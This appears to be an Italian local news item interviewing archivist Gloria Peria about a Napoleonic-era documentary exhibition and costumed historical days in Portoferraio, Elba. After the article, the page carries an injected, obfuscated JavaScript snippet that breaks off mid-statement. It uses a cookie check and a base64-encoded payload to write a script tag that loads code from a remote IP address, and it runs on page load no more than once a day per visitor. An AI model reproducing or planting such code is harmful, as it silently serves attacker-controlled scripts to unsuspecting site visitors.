Questa settimana abbiamo intervistato per voi la dottoressa Gloria Peria, responsabile della Gestione Associata degli Archivi Storici dell’Elba.
La dottoressa ci ha parlato dell’evento realizzato nell’ambito della settimana Archivi Aperti, promossa dalla Regione Toscana con l’obiettivo di valorizzare il patrimonio archivistico e documentario pubblico.
Sarà realizzata una Mostra documentaria e due giornate di “Animazione storica” il cui tema generale sarà “L’Elba al tempo di Napoleone”.
La mostra verrà allestita all’interno dell’Archivio Storico di Portoferraio e presenterà documenti e oggetti inerenti all’Elba durante l’epoca napoleonica. Resterà aperta nei pomeriggi di martedì e giovedì dalle ore 15,30 alle ore 17,30.
Le due giornate di “animazione storica” invece saranno martedì 17 e giovedì 19 novembre, dalle ore 10 alle ore 12 ( si svolgeranno nell’attigua Sala San Salvatore).
La dottoressa Peria ci spiega che la mostra è stata appositamente allestita dall’Associazione culturale Historiae con mobili e suppellettili che ricostruiranno esattamente la realtà ottocentesca.
Niente sarà lasciato al caso e tuti i dettagli riprodurranno fedelmente gli ambienti tipici del primo ottocento.
All’interno della Sala, esperti relatori converseranno sul costume e sulle innovazioni introdotte all’Elba durante il Governo francese e durante il Regno napoleonico.
Nel corso delle conversazioni alcuni membri dell’Associazione culturale, in costume ottocentesco, interagiranno con i relatori e con il pubblico.
Non solo quindi una rappresentazione ma un vero e proprio “tuffo nel passato”: sarà possibile avvicinarsi ai personaggi e ai temi trattati in modo molto realistico.
L’evento, aperto al pubblico in particolare alle Scuole del territorio, si svolgerà all’interno del Centro culturale De Laugier (Salita Napoleone, Portoferraio. Vi aspettiamo numerosi (Per info potete contattare il numero 0565/ 937371).
_ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘